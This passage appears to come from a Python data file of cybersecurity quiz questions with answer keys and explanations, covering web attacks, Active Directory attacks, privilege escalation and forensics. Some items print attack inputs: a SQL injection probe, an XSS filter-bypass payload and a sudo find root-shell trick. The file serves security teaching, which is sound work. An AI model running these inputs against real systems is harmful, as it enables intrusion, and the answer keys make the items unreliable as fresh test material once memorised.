                     "Parameterised / prepared statements", "Hiding SQL error messages"],
         "answer": 2,
         "explain": "Parameterisation sends query structure and data separately, so input can never be parsed as SQL. WAFs and hidden errors only raise the bar."},
        {"q": "You inject `' ORDER BY 8-- -` and get an error, but `ORDER BY 7` works. What did you learn?",
         "options": ["The table has 7 rows", "The query returns 7 columns",
                     "The database is MySQL", "There are 7 users"],
         "answer": 1,
         "explain": "ORDER BY n fails when n exceeds the column count, so 7 works / 8 errors means 7 columns — exactly what a UNION needs to match."},
    ],
    "xss": [
        {"q": "The app strips the string `script`. Which payload still fires?",
         "options": ["<script>alert(1)</script>", "<img src=x onerror=alert(1)>",
                     "&lt;script&gt;alert(1)", "alert(1)"],
         "answer": 1,
         "explain": "Event handlers like onerror execute JS without a <script> tag, so blacklisting 'script' is not a fix."},
        {"q": "Which cookie flag most directly blunts XSS-based session theft?",
         "options": ["Secure", "SameSite", "HttpOnly", "Domain"],
         "answer": 2,
         "explain": "HttpOnly hides the cookie from document.cookie, so injected JavaScript can't read and exfiltrate it."},
    ],
    "csrf": [
        {"q": "Why does an anti-CSRF token stop the attack?",
         "options": ["It encrypts the request", "The attacker's cross-site page can't read or guess it",
                     "It rate-limits the endpoint", "It hides the form"],
         "answer": 1,
         "explain": "The token is unpredictable and same-origin-readable only; a cross-site page can send the cookie but not the token."},
    ],
    "command-injection": [
        {"q": "What is the real fix for OS command injection?",
         "options": ["Blacklist ; and |", "Invoke the program with an argument array (no shell)",
                     "Escape spaces", "Run as a non-root user"],
         "answer": 1,
         "explain": "With shell=False / execve and an argument array there is no shell to interpret metacharacters, so the class disappears. Least-privilege only limits impact."},
    ],
    "idor": [
        {"q": "An endpoint checks the user is logged in, then returns object by id. What's missing?",
         "options": ["Rate limiting", "Encryption", "Per-object (ownership) authorization", "Input validation"],
         "answer": 2,
         "explain": "IDOR is broken object-level authorization: the server must verify the object belongs to (or is permitted for) the current user, not just that they're authenticated."},
    ],
    "jwt": [
        {"q": "A JWT verifier accepts `alg: none`. What does that allow?",
         "options": ["Nothing, none is safe", "Forging tokens with no valid signature",
                     "Only reading claims", "Faster verification"],
         "answer": 1,
         "explain": "alg:none means the token is unsigned; if accepted, an attacker forges any claims (e.g. role=admin) with no key."},
    ],
    "buffer-overflow": [
        {"q": "Which mitigation forces attackers from stack-shellcode to ROP/ret2libc?",
         "options": ["ASLR", "Stack canary", "NX / DEP", "PIE"],
         "answer": 2,
         "explain": "NX marks the stack non-executable, so injected shellcode can't run — attackers must reuse existing executable code (ROP/ret2libc)."},
    ],
    "scanning": [
        {"q": "In a packet capture, how does a TCP SYN scan appear?",
         "options": ["Full 3-way handshakes", "Many SYNs with no completed handshake",
                     "UDP floods", "ICMP echo only"],
         "answer": 1,
         "explain": "A SYN scan sends SYN and never completes the handshake (RST after SYN-ACK) — the half-open pattern an IDS keys on."},
    ],
    "active-directory-attacks": [
        {"q": "What makes Kerberoasting possible?",
         "options": ["Weak TLS", "Service tickets are encrypted with the service account's password key",
                     "Open SMB shares", "Null sessions"],
         "answer": 1,
         "explain": "Any domain user can request a service ticket; it's encrypted with the service account's password-derived key, so a weak password cracks offline."},
        {"q": "DCSync abuses which legitimate feature?",
         "options": ["Group Policy", "Directory replication (as if a domain controller)",
                     "DNS zone transfer", "LDAP paging"],
         "answer": 1,
         "explain": "DCSync impersonates a DC's replication (DsGetNCChanges) to pull password hashes, including krbtgt — full domain compromise."},
    ],
    "privilege-escalation": [
        {"q": "`sudo -l` shows `(root) NOPASSWD: /usr/bin/find`. Why is that a win?",
         "options": ["find is fast", "find can execute commands, so `-exec /bin/sh` runs as root",
                     "find reads /etc/shadow", "It isn't exploitable"],
         "answer": 1,
         "explain": "find's -exec runs arbitrary commands; run as root via sudo it spawns a root shell (a classic GTFOBins vector)."},
    ],
    "yara": [
        {"q": "Why test a new YARA rule against a clean corpus?",
         "options": ["To make it faster", "To measure and minimise false positives",
                     "To pack the samples", "To sign the rule"],
         "answer": 1,
         "explain": "A rule that also matches benign files is unusable in production; validating against clean files proves precision."},
    ],
    "memory-forensics": [
        {"q": "Which Volatility 3 plugin flags injected/unbacked executable memory?",
         "options": ["windows.pslist", "windows.malfind", "windows.netscan", "windows.filescan"],
         "answer": 1,
         "explain": "malfind finds RWX/private memory regions containing code (e.g. injected shellcode) — a strong implant signal."},
    ],
    "threat-hunting": [
        {"q": "Per the Pyramid of Pain, which is most costly for an adversary to change?",
         "options": ["File hash", "IP address", "Domain name", "TTP (technique/behaviour)"],
         "answer": 3,
         "explain": "Hashes/IPs/domains rotate trivially; changing tactics and techniques is expensive — so hunt behaviour, not atomic indicators."},
    ],
}
